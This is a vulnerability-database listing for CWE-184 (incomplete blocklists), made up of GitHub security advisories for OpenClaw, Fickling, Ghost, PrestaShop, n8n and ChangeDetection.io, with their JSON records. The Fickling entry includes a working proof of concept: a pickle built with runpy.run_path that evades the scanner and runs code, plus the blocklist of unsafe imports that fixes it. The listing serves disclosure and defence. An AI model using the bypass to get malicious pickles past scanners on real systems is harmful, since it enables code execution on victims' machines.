Common Weakness Enumeration

CWE-184

Allowed

Incomplete List of Disallowed Inputs

Abstraction: Base · Status: Draft

The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete.

436 vulnerabilities reference this CWE, most recent first.

GHSA-WCM7-94WG-H74H

Vulnerability from github – Published: 2026-04-24 00:31 – Updated: 2026-05-04 21:54
Withdrawn 2026-05-04 VLAI
Summary
Duplicate Advisory: OpenClaw host-env blocklist missing `GIT_TEMPLATE_DIR` and `AWS_CONFIG_FILE` allows code execution via env override
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-6p8r-6m93-557f. This link is maintained to preserve external references.

Original Description

OpenClaw before 2026.3.28 contains an environment variable sanitization vulnerability where GIT_TEMPLATE_DIR and AWS_CONFIG_FILE are not blocked in the host-env blocklist. Attackers can exploit approved exec requests to redirect git or AWS CLI behavior through attacker-controlled configuration files to execute untrusted code or load malicious credentials.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.3.28"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-04T21:54:39Z",
    "nvd_published_at": "2026-04-23T22:16:38Z",
    "severity": "MODERATE"
  },
  "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-6p8r-6m93-557f. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains an environment variable sanitization vulnerability where GIT_TEMPLATE_DIR and AWS_CONFIG_FILE are not blocked in the host-env blocklist. Attackers can exploit approved exec requests to redirect git or AWS CLI behavior through attacker-controlled configuration files to execute untrusted code or load malicious credentials.",
  "id": "GHSA-wcm7-94wg-h74h",
  "modified": "2026-05-04T21:54:39Z",
  "published": "2026-04-24T00:31:51Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m866-6qv5-p2fg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41332"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-code-execution-via-missing-environment-variable-blocklist"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: OpenClaw host-env blocklist missing `GIT_TEMPLATE_DIR` and `AWS_CONFIG_FILE` allows code execution via env override",
  "withdrawn": "2026-05-04T21:54:39Z"
}

GHSA-WFQ2-52F7-7QVJ

Vulnerability from github – Published: 2026-01-09 20:52 – Updated: 2026-01-11 14:54
VLAI
Summary
Fickling has a bypass via runpy.run_path() and runpy.run_module()
Details

Fickling's assessment

runpy was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66).

Original report

Summary

Fickling versions up to and including 0.1.6 do not treat Python’s runpy module as unsafe. Because of this, a malicious pickle that uses runpy.run_path() or runpy.run_module() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.

If a user relies on Fickling’s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.

This affects any workflow or product that uses Fickling as a security gate for pickle deserialization.

Details

The runpy module is missing from fickling's block list of unsafe module imports in fickling/analysis.py. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).

Incriminated source code: - File: fickling/analysis.py - Class: UnsafeImports - Issue: The blocklist does not include runpy, runpy.run_path, runpy.run_module, or runpy._run_code

Reference to similar fix: - PR #187 added pty to the blocklist to fix CVE-2025-67748 - PR #108 documented the blocklist approach - The same fix pattern should be applied for runpy

How the bypass works: 1. Attacker creates a pickle using runpy.run_path() in __reduce__ 2. Fickling's UnsafeImports analysis does not flag runpy as dangerous 3. Only the UnusedVariables heuristic triggers, resulting in SUSPICIOUS severity 4. The pickle should be rated OVERTLY_MALICIOUS like os.system, eval, and exec

Tested behavior (fickling 0.1.6):

Function Fickling Severity RCE Capable
os.system LIKELY_OVERTLY_MALICIOUS Yes
eval OVERTLY_MALICIOUS Yes
exec OVERTLY_MALICIOUS Yes
runpy.run_path SUSPICIOUS Yes ← BYPASS
runpy.run_module SUSPICIOUS Yes ← BYPASS

Suggested fix: Add to the unsafe imports blocklist in fickling/analysis.py: - runpy - runpy.run_path - runpy.run_module - runpy._run_code - runpy._run_module_code

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.Environment: - Python 3.13.2 - fickling 0.1.6 (latest version, installed via pip)

Step 1: Create malicious pickle

import pickle import runpy

class MaliciousPayload: def reduce(self): return (runpy.run_path, ("/tmp/malicious_script.py",))

with open("malicious.pkl", "wb") as f: pickle.dump(MaliciousPayload(), f)

Step 2: Create the malicious script that will be executed

echo 'print("RCE ACHIEVED"); open("/tmp/pwned","w").write("compromised")' > /tmp/malicious_script.py

Step 3: Analyze with fickling

fickling --check-safety malicious.pkl

Expected output (if properly detected): Severity: OVERTLY_MALICIOUS

Actual output (bypass confirmed): { "severity": "SUSPICIOUS", "analysis": "Variable _var0 is assigned value run_path(...) but unused afterward; this is suspicious and indicative of a malicious pickle file", "detailed_results": { "AnalysisResult": { "UnusedVariables": ["_var0", "run_path(...)"] } } }

Step 4: Prove RCE by loading the pickle

import pickle pickle.load(open("malicious.pkl", "rb"))

Check: ls /tmp/pwned <-- file exists, proving code execution

Pickle disassembly (evidence):

0: \x80 PROTO      4
2: \x95 FRAME      92

11: \x8c SHORT_BINUNICODE 'runpy' 18: \x94 MEMOIZE (as 0) 19: \x8c SHORT_BINUNICODE 'run_path' 29: \x94 MEMOIZE (as 1) 30: \x93 STACK_GLOBAL 31: \x94 MEMOIZE (as 2) 32: \x8c SHORT_BINUNICODE '/tmp/malicious_script.py' ... 100: R REDUCE 101: \x94 MEMOIZE (as 5) 102: . STOP

Impact

Vulnerability Type: Incomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).

Who is impacted: Any user or system that relies on fickling to vet pickle files for security issues before loading them. This includes:

Attack scenario: An attacker uploads a malicious ML model or pickle file to a model repository. The victim's pipeline uses fickling to scan uploads. Fickling rates the file as "SUSPICIOUS" (not "OVERTLY_MALICIOUS"), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.

Severity: HIGH - The attacker achieves arbitrary code execution - The security control (fickling) is specifically designed to prevent this - The bypass requires no special conditions beyond crafting the pickle with runpy

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.1.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "fickling"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22606"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-09T20:52:40Z",
    "nvd_published_at": "2026-01-10T02:15:49Z",
    "severity": "HIGH"
  },
  "details": "# Fickling\u0027s assessment\n\n`runpy`  was added to the list of unsafe imports (https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66).\n\n# Original report\n\n### Summary\nFickling versions up to and including 0.1.6 do not treat Python\u2019s runpy module as unsafe. Because of this, a malicious pickle that uses runpy.run_path() or runpy.run_module() is classified as SUSPICIOUS instead of OVERTLY_MALICIOUS.\n\nIf a user relies on Fickling\u2019s output to decide whether a pickle is safe to deserialize, this misclassification can lead them to execute attacker-controlled code on their system.\n\nThis affects any workflow or product that uses Fickling as a security gate for pickle deserialization.\n\n### Details\nThe `runpy` module is missing from fickling\u0027s block list of unsafe module imports in `fickling/analysis.py`. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types).\n\nIncriminated source code:\n- File: `fickling/analysis.py`\n- Class: `UnsafeImports`\n- Issue: The blocklist does not include `runpy`, `runpy.run_path`, `runpy.run_module`, or `runpy._run_code`\n\nReference to similar fix:\n- PR #187 added `pty` to the blocklist to fix CVE-2025-67748\n- PR #108 documented the blocklist approach\n- The same fix pattern should be applied for `runpy`\n\nHow the bypass works:\n1. Attacker creates a pickle using `runpy.run_path()` in `__reduce__`\n2. Fickling\u0027s `UnsafeImports` analysis does not flag `runpy` as dangerous\n3. Only the `UnusedVariables` heuristic triggers, resulting in `SUSPICIOUS` severity\n4. The pickle should be rated `OVERTLY_MALICIOUS` like `os.system`, `eval`, and `exec`\n\nTested behavior (fickling 0.1.6):\n\n| Function          | Fickling Severity          | RCE Capable |\n|-------------------|----------------------------|-------------|\n| os.system         | LIKELY_OVERTLY_MALICIOUS   | Yes         |\n| eval              | OVERTLY_MALICIOUS          | Yes         |\n| exec              | OVERTLY_MALICIOUS          | Yes         |\n| runpy.run_path    | SUSPICIOUS                 | Yes \u2190 BYPASS |\n| runpy.run_module  | SUSPICIOUS                 | Yes \u2190 BYPASS |\n\nSuggested fix:\nAdd to the unsafe imports blocklist in `fickling/analysis.py`:\n- runpy\n- runpy.run_path\n- runpy.run_module\n- runpy._run_code\n- runpy._run_module_code\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._**Environment:**\n- Python 3.13.2\n- fickling 0.1.6 (latest version, installed via pip)\n\nStep 1: Create malicious pickle\n\nimport pickle\nimport runpy\n\nclass MaliciousPayload:\n    def __reduce__(self):\n        return (runpy.run_path, (\"/tmp/malicious_script.py\",))\n\nwith open(\"malicious.pkl\", \"wb\") as f:\n    pickle.dump(MaliciousPayload(), f)\n\nStep 2: Create the malicious script that will be executed\n\necho \u0027print(\"RCE ACHIEVED\"); open(\"/tmp/pwned\",\"w\").write(\"compromised\")\u0027 \u003e /tmp/malicious_script.py\n\nStep 3: Analyze with fickling\n\nfickling --check-safety malicious.pkl\n\nExpected output (if properly detected):\nSeverity: OVERTLY_MALICIOUS\n\nActual output (bypass confirmed):\n{\n    \"severity\": \"SUSPICIOUS\",\n    \"analysis\": \"Variable `_var0` is assigned value `run_path(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file\",\n    \"detailed_results\": {\n        \"AnalysisResult\": {\n            \"UnusedVariables\": [\"_var0\", \"run_path(...)\"]\n        }\n    }\n}\n\nStep 4: Prove RCE by loading the pickle\n\nimport pickle\npickle.load(open(\"malicious.pkl\", \"rb\"))\n# Check: ls /tmp/pwned  \u003c-- file exists, proving code execution\n\nPickle disassembly (evidence):\n\n    0: \\x80 PROTO      4\n    2: \\x95 FRAME      92\n   11: \\x8c SHORT_BINUNICODE \u0027runpy\u0027\n   18: \\x94 MEMOIZE    (as 0)\n   19: \\x8c SHORT_BINUNICODE \u0027run_path\u0027\n   29: \\x94 MEMOIZE    (as 1)\n   30: \\x93 STACK_GLOBAL\n   31: \\x94 MEMOIZE    (as 2)\n   32: \\x8c SHORT_BINUNICODE \u0027/tmp/malicious_script.py\u0027\n   ...\n  100: R    REDUCE\n  101: \\x94 MEMOIZE    (as 5)\n  102: .    STOP\n  \n### Impact\n\nVulnerability Type:\nIncomplete blocklist leading to safety check bypass (CWE-184) and arbitrary code execution via insecure deserialization (CWE-502).\n\nWho is impacted:\nAny user or system that relies on fickling to vet pickle files for security issues before loading them. This includes:\n\nAttack scenario:\nAn attacker uploads a malicious ML model or pickle file to a model repository. The victim\u0027s pipeline uses fickling to scan uploads. Fickling rates the file as \"SUSPICIOUS\" (not \"OVERTLY_MALICIOUS\"), so the file is not rejected. When the victim loads the model, arbitrary code executes on their system.\n\nSeverity: HIGH\n- The attacker achieves arbitrary code execution\n- The security control (fickling) is specifically designed to prevent this\n- The bypass requires no special conditions beyond crafting the pickle with `runpy`",
  "id": "GHSA-wfq2-52f7-7qvj",
  "modified": "2026-01-11T14:54:44Z",
  "published": "2026-01-09T20:52:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-565g-hwwr-4pp3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-r7v6-mfhq-g3m2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/security/advisories/GHSA-wfq2-52f7-7qvj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22606"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/108"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/187"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/pull/195"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/commit/9a2b3f89bd0598b528d62c10a64c1986fcb09f66"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/trailofbits/fickling"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/blob/977b0769c13537cd96549c12bb537f05464cf09c/test/test_bypasses.py#L87"
    },
    {
      "type": "WEB",
      "url": "https://github.com/trailofbits/fickling/releases/tag/v0.1.7"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Fickling has a bypass via runpy.run_path() and runpy.run_module()"
}

GHSA-WPC6-37G7-8Q4W

Vulnerability from github – Published: 2026-04-07 18:14 – Updated: 2026-05-06 21:22
VLAI
Summary
OpenClaw: Shell init-file options could satisfy exec allowlist script matching
Details

Summary

Before OpenClaw 2026.3.31, exec allowlist matching could treat shell init-file wrapper invocations as if the approved script itself were being executed. Shell options such as --rcfile, --init-file, and --startup-file could therefore inherit allowlist trust from a matched script path even though the shell loaded attacker-chosen initialization first.

Impact

This issue only applied when exec allowlist or allow-always behavior was enabled and the attacker could steer a shell-wrapper command shape that used init-file options. The result was a narrower allowlist bypass, not generic arbitrary command execution from an untrusted boundary.

Affected Packages / Versions

  • Package: openclaw (npm)
  • Affected versions: < 2026.3.31
  • Patched versions: >= 2026.3.31
  • Latest published npm version: 2026.4.1

Fix Commit(s)

  • 0c8375424620e12777ef24c162eedc7e9fcfd7e3 — reject shell init-file script matches

Release Process Note

The fix shipped in OpenClaw 2026.3.31 on March 31, 2026. The current published npm release 2026.4.1 from April 1, 2026 also contains the fix.

Thanks @cyjhhh for reporting.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.3.31"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41392"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-07T18:14:35Z",
    "nvd_published_at": "2026-04-28T19:37:42Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nBefore OpenClaw 2026.3.31, exec allowlist matching could treat shell init-file wrapper invocations as if the approved script itself were being executed. Shell options such as `--rcfile`, `--init-file`, and `--startup-file` could therefore inherit allowlist trust from a matched script path even though the shell loaded attacker-chosen initialization first.\n\n## Impact\n\nThis issue only applied when exec allowlist or allow-always behavior was enabled and the attacker could steer a shell-wrapper command shape that used init-file options. The result was a narrower allowlist bypass, not generic arbitrary command execution from an untrusted boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `\u003c 2026.3.31`\n- Patched versions: `\u003e= 2026.3.31`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `0c8375424620e12777ef24c162eedc7e9fcfd7e3` \u2014 reject shell init-file script matches\n\n## Release Process Note\n\nThe fix shipped in OpenClaw `2026.3.31` on March 31, 2026. The current published npm release `2026.4.1` from April 1, 2026 also contains the fix.\n\nThanks @cyjhhh for reporting.",
  "id": "GHSA-wpc6-37g7-8q4w",
  "modified": "2026-05-06T21:22:43Z",
  "published": "2026-04-07T18:14:35Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-wpc6-37g7-8q4w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41392"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/0c8375424620e12777ef24c162eedc7e9fcfd7e3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-shell-init-file-options"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw: Shell init-file options could satisfy exec allowlist script matching"
}

GHSA-WRR6-P5R6-474M

Vulnerability from github – Published: 2026-06-16 21:31 – Updated: 2026-06-18 20:10
Withdrawn 2026-06-18 VLAI
Summary
Duplicate Advisory: Exec allowlist could miss side effects from transparent command wrappers
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-cwpp-5962-q4f6. This link is maintained to preserve external references.

Original Description

OpenClaw before 2026.5.26 contains an exec allowlist bypass vulnerability allowing authenticated operators to execute wrapper-level side effects outside allowlisted command intent. Attackers can craft command requests that bypass allowlist validation by leveraging transparent command wrappers to perform unintended operations.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2026.5.22"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T20:10:14Z",
    "nvd_published_at": "2026-06-16T19:17:01Z",
    "severity": "LOW"
  },
  "details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of\u00a0GHSA-cwpp-5962-q4f6. This link is maintained to preserve external references.\n\n## Original Description\n\nOpenClaw before 2026.5.26 contains an exec allowlist bypass vulnerability allowing authenticated operators to execute wrapper-level side effects outside allowlisted command intent. Attackers can craft command requests that bypass allowlist validation by leveraging transparent command wrappers to perform unintended operations.",
  "id": "GHSA-wrr6-p5r6-474m",
  "modified": "2026-06-18T20:10:14Z",
  "published": "2026-06-16T21:31:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwpp-5962-q4f6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53848"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-exec-allowlist-bypass-via-transparent-command-wrappers"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: Exec allowlist could miss side effects from transparent command wrappers",
  "withdrawn": "2026-06-18T20:10:14Z"
}

GHSA-WVP2-4QQP-4H3R

Vulnerability from github – Published: 2026-08-04 21:13 – Updated: 2026-08-04 21:13
VLAI
Summary
Ghost: Private IP filtering bypass to make server-side requests to internal services
Details

Impact

When making an external request, it is possible to bypass the IP filter that ensures the request isn't going to an internal service using an IPv6 literal which maps to a private IPv4 address.

Vulnerable versions

This vulnerability is present in Ghost from v6.0.9 up to v6.21.0.

Patches

v6.21.1 contains a fix for this issue.

How to update

For self-hosters using Docker, find Docker's official Ghost image here. Updating a Docker-based Ghost instance is documented here.

If your Ghost is a Ghost-CLI install see our documentation on updating it to the latest version here.

References

Ghost thanks l3tchupkt for disclosing this vulnerability responsibly.

For more information

If you have any questions or comments about this advisory, email us at security@ghost.org.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 6.21.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "ghost"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.9"
            },
            {
              "fixed": "6.21.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-53944"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-08-04T21:13:16Z",
    "nvd_published_at": "2026-06-24T19:17:11Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\nWhen making an external request, it is possible to bypass the IP filter that ensures the request isn\u0027t going to an internal service using an IPv6 literal which maps to a private IPv4 address.\n\n### Vulnerable versions\n\nThis vulnerability is present in Ghost from v6.0.9 up to v6.21.0.\n\n### Patches\n\nv6.21.1 contains a fix for this issue.\n\n### How to update\n\nFor self-hosters using Docker, find [Docker\u0027s official Ghost image here](https://hub.docker.com/_/ghost). Updating a Docker-based Ghost instance [is documented here](https://docs.ghost.org/install/docker#updating-ghost). \n\nIf your Ghost is a Ghost-CLI install see our documentation on [updating it to the latest version here](https://docs.ghost.org/update). \n\n### References\n\nGhost thanks [l3tchupkt](http://github.com/l3tchupkt) for disclosing this vulnerability responsibly.\n\n### For more information\n\nIf you have any questions or comments about this advisory, email us at [security@ghost.org](mailto:security@ghost.org).",
  "id": "GHSA-wvp2-4qqp-4h3r",
  "modified": "2026-08-04T21:13:16Z",
  "published": "2026-08-04T21:13:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/TryGhost/Ghost/security/advisories/GHSA-wvp2-4qqp-4h3r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53944"
    },
    {
      "type": "WEB",
      "url": "https://github.com/TryGhost/Ghost/pull/26749"
    },
    {
      "type": "WEB",
      "url": "https://github.com/TryGhost/Ghost/commit/9b7f2212970fade08ecbec543b405190471e38d4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/TryGhost/Ghost"
    },
    {
      "type": "WEB",
      "url": "https://github.com/TryGhost/Ghost/releases/tag/v6.21.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Ghost: Private IP filtering bypass to make server-side requests to internal services"
}

GHSA-WVPG-4WRH-5889

Vulnerability from github – Published: 2025-10-16 20:00 – Updated: 2025-10-16 20:00
VLAI
Summary
PrestaShop Checkout Target PayPal merchant account hijacking from backoffice
Details

Impact

Wrong usage of the PHP array_search() allows bypass of validation.

Patches

The problem has been patched in versions: - v4.4.1 for PrestaShop 1.7 (build number: 7.4.4.1) - v4.4.1 for PrestaShop 8 (build number: 8.4.4.1) - v5.0.5 for PrestaShop 1.7 (build number: 7.5.0.5) - v5.0.5 for PrestaShop 8 (build number: 8.5.0.5) - v5.0.5 for PrestaShop 9 (build number: 9.5.0.5)

Read the Versioning policy to learn more about the build number.

Credits

Léo CUNÉAZ reported this issue.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "prestashop/ps_checkout"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.4.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "prestashop/ps_checkout"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-61924"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-16T20:00:47Z",
    "nvd_published_at": "2025-10-16T18:15:39Z",
    "severity": "LOW"
  },
  "details": "### Impact\nWrong usage of the PHP `array_search()` allows bypass of validation.\n\n### Patches\nThe problem has been patched in versions:\n- v4.4.1 for PrestaShop 1.7 (build number: 7.4.4.1)\n- v4.4.1 for PrestaShop 8 (build number: 8.4.4.1)\n- v5.0.5 for PrestaShop 1.7 (build number: 7.5.0.5)\n- v5.0.5 for PrestaShop 8 (build number: 8.5.0.5)\n- v5.0.5 for PrestaShop 9 (build number: 9.5.0.5)\n\nRead the [Versioning policy](https://github.com/PrestaShopCorp/ps_checkout/wiki/Versioning) to learn more about the build number.\n\n### Credits\n[L\u00e9o CUN\u00c9AZ](https://github.com/inem0o) reported this issue.",
  "id": "GHSA-wvpg-4wrh-5889",
  "modified": "2025-10-16T20:00:47Z",
  "published": "2025-10-16T20:00:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/PrestaShopCorp/ps_checkout/security/advisories/GHSA-wvpg-4wrh-5889"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61924"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/PrestaShopCorp/ps_checkout"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PrestaShop Checkout Target PayPal merchant account hijacking from backoffice"
}

GHSA-X2RH-RHM8-CV8V

Vulnerability from github – Published: 2026-07-01 00:34 – Updated: 2026-07-01 00:34
VLAI
Details

n8n before 2.25.7 and 2.26.x before 2.26.2 contains an abstract syntax tree (AST) security validator bypass in the Python Code node. An authenticated user with permission to create or modify workflows containing a Python Code node can bypass the validator and access the task executor module namespace. The issue only affects self-hosted instances where the Python Task Runner is enabled; where N8N_BLOCK_RUNNER_ENV_ACCESS is configured to allow it, this can disclose environment variables accessible to the task runner process.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-56777"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-30T23:17:32Z",
    "severity": "MODERATE"
  },
  "details": "n8n before 2.25.7 and 2.26.x before 2.26.2 contains an abstract syntax tree (AST) security validator bypass in the Python Code node. An authenticated user with permission to create or modify workflows containing a Python Code node can bypass the validator and access the task executor module namespace. The issue only affects self-hosted instances where the Python Task Runner is enabled; where N8N_BLOCK_RUNNER_ENV_ACCESS is configured to allow it, this can disclose environment variables accessible to the task runner process.",
  "id": "GHSA-x2rh-rhm8-cv8v",
  "modified": "2026-07-01T00:34:14Z",
  "published": "2026-07-01T00:34:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-jwm3-qcfw-c5pp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56777"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/n8n-ast-validator-bypass-in-python-code-node"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-X3F8-2W95-HW4M

Vulnerability from github – Published: 2026-04-01 21:30 – Updated: 2026-04-01 21:30
VLAI
Details

ChangeDetection.io versions prior to 0.54.7 contain a protection bypass vulnerability in the SafeXPath3Parser implementation that allows attackers to read arbitrary local files by using unblocked XPath 3.0/3.1 functions such as json-doc() and similar file-access primitives. Attackers can exploit the incomplete blocklist of dangerous XPath functions to access sensitive data from the local filesystem.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-35000"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-04-01T19:16:33Z",
    "severity": "HIGH"
  },
